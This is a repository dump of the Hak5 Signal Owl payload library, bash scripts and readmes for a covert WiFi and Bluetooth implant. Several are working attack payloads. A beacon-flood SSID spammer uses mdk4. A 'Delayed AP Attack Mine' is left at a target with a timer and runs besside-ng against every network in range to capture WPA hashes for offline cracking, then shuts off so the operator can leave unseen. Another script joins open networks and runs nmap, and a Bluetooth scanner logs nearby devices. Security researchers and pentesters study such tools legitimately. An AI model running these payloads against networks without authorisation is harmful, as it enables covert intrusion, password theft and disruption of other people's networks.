├── payloads ├── library │ ├── wifi │ │ ├── WiFi-Connect │ │ │ └── payload.txt │ │ ├── Garbage-SSID-Spammer │ │ │ └── payload.txt │ │ ├── Delayed-AP-Attack-Mine │ │ │ ├── payload.txt │ │ │ └── readme.md │ │ └── Open-AP-Nmap-Scanner │ │ │ └── payload.txt │ ├── general │ │ └── arming-mode │ │ │ └── payload.txt │ └── bluetooth │ │ └── Bluetooth-Scanner │ │ ├── payload.txt │ │ └── README.md └── extensions │ └── wifi_connect.sh └── README.md /payloads/library/wifi/WiFi-Connect/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Title: Simple WiFi Connection Example 3 | # Author: Hak5Darren 4 | # Version: 1.0 5 | 6 | # WiFi Client Setup 7 | WIFI_SSID="network-name" 8 | WIFI_PASS="passphrase" 9 | 10 | LED SETUP 11 | WIFI_CONNECT 12 | # optionally start SSH server 13 | # /etc/init.d/sshd start 14 | LED ATTACK 15 | -------------------------------------------------------------------------------- /payloads/library/wifi/Garbage-SSID-Spammer/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Title: Garbage SSID Spammer 3 | # Description: Uses mdk4 to beacon non-printable SSIDs and SSIDs that break the 32-byte limit 4 | # Author: Hak5Darren 5 | # Props: ASPj and the aircrack-ng community 6 | # Version: 1.0 7 | 8 | LED SETUP 9 | airmon-ng start wlan0 10 | LED ATTACK 11 | mdk4 wlan0mon b -a -m -s 500 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Payload Library for the Signal Owl by Hak5 2 | 3 | ![Signal Owl](https://cdn.shopify.com/s/files/1/0068/2142/files/signal-owl_400x.jpg "Signal Owl") 4 | 5 | * [Purchase](https://shop.hak5.org/products/signal-owl "Purchase at Hak5.org") 6 | * [Forums](https://forums.hak5.org/forum/98-signal-owl/ "Signal Owl Forums") 7 | * [Documentation](https://docs.hak5.org/hc/en-us/categories/360002117953-Signal-Owl "Signal Owl Documentation") 8 | * [Downloads](https://downloads.hak5.org/ "Signal Owl Downloads") 9 | -------------------------------------------------------------------------------- /payloads/extensions/wifi_connect.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: WIFI_CONNECT 4 | # Description: Simplifies WiFi client mode connection. Expects $WIFI_SSID and $WIFI_PASS 5 | # Author: Hak5Darren 6 | 7 | function WIFI_CONNECT() { 8 | [[ "x$WIFI_INT" == "x" ]] && WIFI_INT=wlan0 9 | ifconfig $WIFI_INT up;sleep 10 10 | echo -e "network={\nssid=\"$WIFI_SSID\"\npsk=\"$WIFI_PASS\"\npriority=1\n}">/tmp/wpa-$WIFI_INT.conf 11 | wpa_supplicant -B -Dnl80211 -i $WIFI_INT -c /tmp/wpa-$WIFI_INT.conf 12 | while(iwconfig $WIFI_INT | grep Not-Associated); do sleep 1; done 13 | udhcpc -i $WIFI_INT 14 | } 15 | export -f WIFI_CONNECT 16 | -------------------------------------------------------------------------------- /payloads/library/general/arming-mode/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Title: Arming Mode 3 | # Author: Hak5 4 | # Version: 1.0 5 | 6 | function check_version() { 7 | VERSION=$(cat /etc/owl/VERSION) 8 | [[ $VERSION = "1.0.0" ]] || { 9 | echo "ERROR: Requires firmware version 1.0.0." > /dev/console 10 | return 1 11 | } 12 | } 13 | 14 | function configure_network() { 15 | uci set wireless.radio0.disabled='0' 16 | uci commit wireless 17 | 18 | /etc/init.d/network restart 19 | } 20 | 21 | function start_ssh() { 22 | /etc/init.d/sshd start 23 | } 24 | 25 | function run() { 26 | check_version && { 27 | echo "ARMING" > /tmp/MODE 28 | 29 | configure_network 30 | start_ssh 31 | 32 | LED R DOUBLE 33 | } 34 | } 35 | 36 | run &> /dev/null 37 | -------------------------------------------------------------------------------- /payloads/library/wifi/Delayed-AP-Attack-Mine/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Title: Timed-AP-Attack 3 | # Description: Starts an aggressive AP attack after n seconds, stops after n seconds, and then shuts down 4 | # Author: Saint Crossbow 5 | # Version: 1.0 6 | 7 | # Careful since not nicest thing to do and aggressive. 8 | # Check your RoE and ensure you do not get collateral damange 9 | # -b Attack a specific BSSID 10 | # -W Attack only WPA 11 | # -c Lock on specific channel 12 | # Once complete, the capture files are in the /root/loot directory. Extract using: 13 | # aircrack-ng -J filebase capturefile.cap 14 | # After that crack the hash using john or hashcat 15 | 16 | LED SETUP 17 | # Short fuse: starting in 5 minutes 18 | START_IN=300 19 | # Gather for 2 minutes 20 | GATHER_FOR=120 21 | # Leave blank if you want to attack all APs 22 | TARGET_BSSID="" 23 | 24 | echo "|_ Starting in $START_IN seconds, gathering for $GATHER_FOR seconds" 25 | if [ -z "$TARGET_BSSID" ] 26 | then 27 | echo "|_ Attack all in range" 28 | else 29 | echo "|_ Attack only $TARGET_BSSID" 30 | fi 31 | 32 | sleep $START_IN 33 | 34 | LED ATTACK 35 | 36 | echo "[*] Starting attack" 37 | 38 | if [ -z "$TARGET_BSSID" ] 39 | then 40 | echo "[*] Attacking all APs in range..." 41 | besside-ng wlan0 & 42 | bpid=$! 43 | else 44 | echo "[*] Attacking only $TARGET_BSSID..." 45 | besside-ng -b $TARGET_BSSID wlan0 & 46 | bpid=$! 47 | fi 48 | 49 | sleep $GATHER_FOR 50 | 51 | echo "[*] Stopping attack" 52 | kill $bpid 53 | wait $bpid 54 | 55 | mv /besside.log /root/loot 56 | mv /*.cap /root/loot 57 | sync 58 | 59 | LED SUCCESS 60 | 61 | echo "[*] Shutting down" 62 | poweroff 63 | -------------------------------------------------------------------------------- /payloads/library/wifi/Delayed-AP-Attack-Mine/readme.md: -------------------------------------------------------------------------------- 1 | # Delayed AP Attack Mine 2 | ### Set your fuse, make a quick getaway, and let your Signal Owl crack WiFi while everyone else is gone 3 | --- 4 | Turn your Signal Owl into a powerful implant by using Besside-ng to attack networks. Besside-ng is an amazing application that aggressively attacks WiFi networks and obtains a hash for cracking offline. In the unlikely event WEP is found, it is cracked immediately. Your Signal Owl already has it installed - but this particular payload delays the attack so you don't have to present when it runs (or even better when no one is at the target area at all). 5 | 6 | An external WiFi adapter is required for this payload. The Hak5 RT5370 was tested and works perfectly. 7 | 8 | **WARNING: This program is very aggressive: ensure you are on sound legal ground and only run it if your rules of engagement allow such attacks. Research your target beforehand to ensure you do not have collateral damage.** 9 | 10 | *Setup* 11 | 1. Boot into ARMING mode 12 | 2. Copy the payload to /root/payload.txt 13 | 3. Enable to run by: 14 | `chmod +x payload.txt` 15 | 4. Open the payload with nano 16 | 5. Change the START_IN value to be length of your "delay fuse" in seconds - this is your time to make your exit, stage left 17 | 6. Change the GATHER_FOR value to be the length you want besside-ng to run. Consider your target's level of attention accordingly 18 | 7. Set the BSSID if you want to only attack a specific network 19 | 8. Save, exit, and shutdown. 20 | 21 | The mine is ready for implant. 22 | 23 | *Deploy* 24 | 1. Connect the WiFi adapter 25 | 2. Place the Signal Owl at your target. Once booted and on it will stay steady red until the payload runs 26 | 3. Set your watch and leave 27 | 4. After the timer is up, besside-ng will run for the specified time during which the LED will flash slightly in ATTACK pattern. 28 | 5. After the run, the Signal Owl will power off (LED will of couse be off as well). 29 | 30 | *Gather Loot* 31 | 1. All loot is found in the /root/loot directory 32 | 2. To extract hashes, use: 33 | `aircrack-ng -J filebase capturefile.cap` 34 | 3. Use your favorite password cracker to obtain the passphrase - YMMV based on passphrase difficulty. May I recommend byepass for ease of use? 35 | 36 | -------------------------------------------------------------------------------- /payloads/library/bluetooth/Bluetooth-Scanner/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Bluetooth Scanner 4 | # Author: Brian Fair , https://github.com/b1fair 5 | # Version: 1.0 6 | # 7 | # Description: Scans for bluetooth devices, optionally interrogates them (hcitool info), tested with Hak5 "Mini USB Bluetooth Adapter (Qualcomm CSR8510 chipset)" 8 | # 9 | # LED SETUP: Scanning 10 | # LED ATTACK: Querying devices 11 | # 12 | 13 | LOOT_DIR=/root/loot/bluetooth_scan 14 | BT_OUTFILE=`date +%s`.bt.list # File (in LOOT_DIR) to write list of observed MACs to 15 | BT_INFOFILE=`date +%s`.bt.info # File (in LOOT_DIR) to write results of "hcitool info " to (if enabled) 16 | BTDEV=hci0 # Set to the device to use for scanning (probably hci0) 17 | DEBUG=0 # Set to 1 to enable verbose logging. 18 | INTERROGATE=1 # Set to 1 to enable running "hcitool info " on observed bluetooth MACs, 0 to disable this. 19 | 20 | function scan_bluetooth() { 21 | LED SETUP 22 | [[ $DEBUG == 1 ]] && echo ... Scanning for bluetooth devices... | tee -a /tmp/payload.log 23 | hcitool scan |egrep -v "^Scanning" > /tmp/bluetooth_scan 24 | total_bts=$(cat /tmp/bluetooth_scan | wc -l) 25 | [[ $DEBUG == 1 ]] && echo ... Found "$total_bts" bluetooth devices | tee -a /tmp/payload.log 26 | for check_bt_mac in `cat /tmp/bluetooth_scan |awk '{print $1}'` 27 | do 28 | grep -i -q $check_bt_mac $LOOT_DIR/$BT_OUTFILE 29 | if [ $? == 0 ] 30 | then 31 | [[ $DEBUG == 1 ]] && echo --- "$check_bt_mac": Already seen, not logging. | tee -a /tmp/payload.log 32 | else 33 | [[ $DEBUG == 1 ]] && echo +++ "$check_bt_mac": New MAC, logging... | tee -a /tmp/payload.log 34 | echo -e "`date`\t`grep -i $check_bt_mac /tmp/bluetooth_scan`" >>$LOOT_DIR/$BT_OUTFILE 35 | fi 36 | done 37 | 38 | } 39 | 40 | function interrogate_bluetooth() { 41 | LED ATTACK 42 | current_bt=$(sed -n "$on"p /tmp/bluetooth_scan | awk '{print $2}') 43 | current_bt_mac=$(sed -n "$on"p /tmp/bluetooth_scan | awk '{print $1}') 44 | if grep -i -q "$current_bt_mac" /tmp/bt_scanned; then 45 | [[ $DEBUG == 1 ]] && echo --- "$current_bt_mac": Already interrogated, skipping. | tee -a /tmp/payload.log 46 | else 47 | bluetooth_info 48 | fi 49 | } 50 | 51 | function bluetooth_info() { 52 | [[ $DEBUG == 1 ]] && echo +++ "$current_bt_mac": Not yet scanned, scanning... | tee -a /tmp/payload.log 53 | echo "Begin $current_bt_mac ----------------------" >>$LOOT_DIR/$BT_INFOFILE 54 | hcitool info $current_bt_mac >>$LOOT_DIR/$BT_INFOFILE 55 | echo $current_bt_mac >> /tmp/bt_scanned 56 | } 57 | 58 | function run() { 59 | runonce 60 | while true; do 61 | setup 62 | scan_bluetooth 63 | if [ "$INTERROGATE" -eq 1 ] 64 | then 65 | while [ "$on" -le "$total_bts" ] 66 | do 67 | if [ "$on" -ge 1 ]; then interrogate_bluetooth; fi 68 | let on=on+1 69 | done 70 | else 71 | [[ $DEBUG == 1 ]] && echo ... Interrogate mode is not enabled, skipping scans. | tee -a /tmp/payload.log 72 | fi 73 | sleep 5 74 | [[ $DEBUG == 1 ]] && echo ... Completed recon. Restarting... | tee -a /tmp/payload.log 75 | done 76 | } 77 | 78 | function runonce() { 79 | hciconfig $BTDEV up 80 | [[ $DEBUG == 1 ]] && echo "-----------------------------------------" | tee -a /tmp/payload.log 81 | [[ $DEBUG == 1 ]] && echo Our local bluetooth device info: | tee -a /tmp/payload.log 82 | [[ $DEBUG == 1 ]] && hciconfig | tee -a /tmp/payload.log 83 | [[ $DEBUG == 1 ]] && echo "-----------------------------------------" | tee -a /tmp/payload.log 84 | > /tmp/bluetooth_scan 85 | > /tmp/bt_scanned 86 | mkdir -p $LOOT_DIR 87 | touch $LOOT_DIR/$BT_OUTFILE 88 | touch $LOOT_DIR/$BT_INFOFILE 89 | echo -e "`date`\tStartup" >>$LOOT_DIR/$BT_OUTFILE 90 | } 91 | 92 | function setup() { 93 | on=0 94 | } 95 | 96 | # Run payload 97 | 98 | run 99 | 100 | -------------------------------------------------------------------------------- /payloads/library/wifi/Open-AP-Nmap-Scanner/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Open AP Nmap Scanner 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # 7 | # Description: Scans for open access points, then connects to each and runs an Nmap scan saving logs to the loot folder 8 | # 9 | # LED SETUP: Scanning 10 | # LED ATTACK: Connected, running nmap scan 11 | # 12 | # See nmap --help for options. Default "-sP" ping scans the address space for fast host discovery. 13 | 14 | NMAP_OPTIONS="-sP" 15 | LOOT_DIR=/root/loot/open_ap_nmap_scan 16 | MAX_CIDR=20 17 | DEBUG=1 18 | 19 | function scan_wifi() { 20 | [[ $DEBUG == 1 ]] && echo Scanning for open access points | tee -a /tmp/payload.log 21 | iwlist wlan0 scan > /tmp/wifi_scan 22 | cat /tmp/wifi_scan | grep "Encryption key:off" -A1 | grep ESSID | sort | uniq | cut -c 28- | sed "s/.$//g" > /tmp/open 23 | total_aps=$(cat /tmp/open | wc -l) 24 | [[ $DEBUG == 1 ]] && echo Found "$total_aps" open access points | tee -a /tmp/payload.log 25 | } 26 | 27 | function check_ap() { 28 | current_ap=$(sed -n "$on"p /tmp/open) 29 | [[ $DEBUG == 1 ]] && echo "-------------------------------" | tee -a /tmp/payload.log 30 | current_ap_mac=$(cat /tmp/wifi_scan | grep "$current_ap" -B5 | grep Address | awk {'print $5'} | head -1) 31 | [[ $DEBUG == 1 ]] && echo Selected AP MAC: "$current_ap_mac" | tee -a /tmp/payload.log 32 | if grep -i -q "$current_ap_mac" /tmp/nmap_scanned; then 33 | [[ $DEBUG == 1 ]] && echo Skipping - Already scanned AP: "$current_ap" with MAC: "$current_ap_mac" | tee -a /tmp/payload.log 34 | else 35 | connect_wifi 36 | scan_network 37 | fi 38 | } 39 | 40 | function connect_wifi() { 41 | LED STAGE1 42 | [[ $DEBUG == 1 ]] && echo Connecting to Open WiFi AP: "$current_ap" | tee -a /tmp/payload.log 43 | ifconfig wlan0 down 44 | iwconfig wlan0 mode Managed essid "$current_ap" 45 | ifconfig wlan0 up 46 | while(iwconfig wlan0 | grep Not-Associated); do sleep 1; done 47 | [[ $DEBUG == 1 ]] && echo "Connected to AP number $on with SSID $current_ap" | tee -a /tmp/payload.log 48 | udhcpc -i wlan0 49 | while [ -z "$SUBNET" ]; do 50 | sleep 1 && find_subnet 51 | done 52 | APMAC=$(iw wlan0 link | grep Connected | awk {print'$3'}) 53 | [[ $DEBUG == 1 ]] && echo "AP MAC Address/BSSID: $APMAC" | tee -a /tmp/payload.log 54 | [[ $DEBUG == 1 ]] && iwconfig wlan0 | grep ESSID | tee -a /tmp/payload.log 55 | [[ $DEBUG == 1 ]] && ifconfig wlan0 | grep inet | tee -a /tmp/payload.log 56 | } 57 | 58 | function scan_network() { 59 | LED STAGE2 60 | find_subnet 61 | [[ $DEBUG == 1 ]] && echo "Found Subnet: $SUBNET" | tee -a /tmp/payload.log 62 | CIDR=$(echo $SUBNET | cut -d '/' -f 2) 63 | [[ $DEBUG == 1 ]] && echo "CIDR: $CIDR" | tee -a /tmp/payload.log 64 | if [ "$CIDR" -ge "$MAX_CIDR" ] 65 | then 66 | [[ $DEBUG == 1 ]] && echo "Starting network scan" | tee -a /tmp/payload.log 67 | nmap $NMAP_OPTIONS $SUBNET -oN "$LOOT_DIR/$current_ap-$APMAC.txt" &>/dev/null 68 | else 69 | [[ $DEBUG == 1 ]] && echo "Network too large - skipping scan" | tee -a /tmp/payload.log 70 | fi 71 | echo $APMAC >> /tmp/nmap_scanned 72 | } 73 | 74 | function find_subnet() { 75 | SUBNET=$(ip addr | grep -i wlan0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') 76 | [[ $DEBUG == 1 ]] && echo "Found subet for network $current_ap as $SUBNET" | tee -a /tmp/payload.log 77 | } 78 | 79 | 80 | function run() { 81 | while true; do 82 | setup 83 | scan_wifi 84 | while [ "$on" -le "$total_aps" ] 85 | do 86 | if [ "$on" -ge 1 ]; then check_ap; fi 87 | let on=on+1 88 | done 89 | sleep 5 90 | [[ $DEBUG == 1 ]] && echo Completed recon. Restarting... | tee -a /tmp/payload.log 91 | done 92 | } 93 | 94 | function setup() { 95 | LED SETUP 96 | mkdir -p $LOOT_DIR 97 | touch /tmp/nmap_scanned 98 | on=0 99 | killall wpa_supplicant 100 | } 101 | 102 | # Run payload 103 | 104 | run 105 | 106 | 107 | -------------------------------------------------------------------------------- /payloads/library/bluetooth/Bluetooth-Scanner/README.md: -------------------------------------------------------------------------------- 1 | # A basic bluetooth scanner 2 | 3 | Scans for bluetooth devices, and optionally interrogates them (using hcitool info). 4 | 5 | ## 1. Hardware 6 | 7 | Tested with Hak5's "Mini USB Bluetooth Adapter" (Uses the Qualcomm CSR8510 chipset). 8 | 9 | ## 2. Configuration Variables 10 | 11 | Where to write our output (loot): 12 | ``` 13 | LOOT_DIR=/root/loot/bluetooth_scan 14 | ``` 15 | Where scan results should go (using unix timestamp for uniqueness): 16 | ``` 17 | BT_OUTFILE=`date +%s`.bt.list 18 | ``` 19 | Where interrogation results should go (using unix timestamp for uniqueness): 20 | ``` 21 | BT_INFOFILE=`date +%s`.bt.info 22 | ``` 23 | Your bluetooth device, probably hci0: 24 | ``` 25 | BTDEV=hci0 26 | ``` 27 | Setting DEBUG to 1 will result in a lot more output to console and to /tmp/payload.log (does not survive reboot) 28 | ``` 29 | DEBUG=0 30 | ``` 31 | Setting INTERROGATE to 1 enables running hcitool info on all discovered devices, and logging to BT_INFOFILE, on by default. 32 | ``` 33 | INTERROGATE=1 34 | ``` 35 | 36 | ## 3. Sample output 37 | 38 | ### a. The loot directory 39 | 40 | ...should look like this: 41 | ``` 42 | root@Owl:~/loot/bluetooth_scan# ls -al 43 | drwxr-xr-x 2 root root 0 Aug 7 10:21 . 44 | drwxr-xr-x 3 root root 0 Aug 7 08:48 .. 45 | -rw-r--r-- 1 root root 0 Aug 7 10:21 1565173272.bt.info 46 | -rw-r--r-- 1 root root 153 Aug 7 10:24 1565173272.bt.list 47 | ``` 48 | ### b. Basic scan details 49 | 50 | Bluetooth MACs are logged when first seen, with a timestamp. I'm not sure if the clock is ever right, but the 'startup' time gives a frame of reference. 51 | ``` 52 | root@Owl:~/loot/bluetooth_scan# cat 1565172658.bt.list 53 | Wed Aug 7 10:10:59 UTC 2019 Startup 54 | Wed Aug 7 10:18:25 UTC 2019 F8:38:80:B0:AA:AA iPhone 55 | Wed Aug 7 10:19:10 UTC 2019 30:21:19:C5:AA:BB SCR1986BT-AS 56 | ``` 57 | 58 | ### c. Interrogation results 59 | 60 | If INTERROGATE=1, you'll get the results of hcitool info here. 61 | 62 | ``` 63 | root@Owl:~/loot/bluetooth_scan# cat 1565172658.bt.info 64 | Begin F8:38:80:B0:AA:AA ---------------------- 65 | Requesting information ... 66 | BD Address: F8:38:80:B0:AA:AA 67 | Device Name: iPhone 68 | LMP Version: 5.0 (0x9) LMP Subversion: 0x4307 69 | Manufacturer: Broadcom Corporation (15) 70 | Features page 0: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 71 | <3-slot packets> <5-slot packets> 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | <3-slot EDR ACL> 80 | <5-slot EDR ACL> 81 | 82 | <3-slot EDR eSCO> 83 | 84 | 85 | 86 | Features page 1: 0x0f 0x00 0x00 0x00 0x00 0x00 0x00 0x00 87 | Features page 2: 0x7f 0x0f 0x00 0x00 0x00 0x00 0x00 0x00 88 | Begin 30:21:19:C5:BB:BB ---------------------- 89 | Requesting information ... 90 | BD Address: 30:21:19:C5:BB:BB 91 | Device Name: SCR1986BT-AS 92 | LMP Version: 3.0 (0x5) LMP Subversion: 0x1f4 93 | Manufacturer: CONWISE Technology Corporation Ltd (66) 94 | Features page 0: 0xbf 0x3a 0x85 0xfa 0x98 0x1d 0x59 0x87 95 | <3-slot packets> <5-slot packets> 96 | 97 | 98 | 99 | 100 | 101 | <3-slot EDR ACL> <5-slot EDR ACL> 102 | 103 | 104 | 105 | Features page 1: 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 106 | ``` 107 | --------------------------------------------------------------------------------